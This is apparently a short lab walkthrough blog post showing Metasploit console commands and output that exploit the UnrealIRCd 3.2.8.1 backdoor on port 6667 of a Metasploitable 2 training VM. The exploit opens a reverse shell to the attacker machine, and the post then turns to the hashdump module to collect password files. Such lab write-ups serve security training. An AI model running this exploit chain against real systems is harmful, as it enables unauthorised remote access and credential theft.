Sunday, August 23, 2020

Attacking port 6667 on Metasploitable 2

msf5 > db_nmap -sS -A 192.168.92.1/24

msf5 > search irc

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > info

       Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
     Module: exploit/unix/irc/unreal_ircd_3281_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-06-12

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.92.129
RHOSTS => 192.168.92.129
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.92.129   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 192.168.92.128:4444 
[*] 192.168.92.129:6667 - Connected to 192.168.92.129:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.92.129:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BCNTNmWzC7uENOcl;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "BCNTNmWzC7uENOcl\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.92.128:4444 -> 192.168.92.129:54096) at 2020-08-23 08:16:47 -0400

Keep the session (send it to the background)

Ctrl+Z

Background session 1? [y/N]  y
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.92.128:4444 -> 192.168.92.129:54096 (192.168.92.129)

Use post/linux/gather/hashdump to collect the password files

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > back
msf5 > use post/linux/gather/hashdump

Use the session that is already established



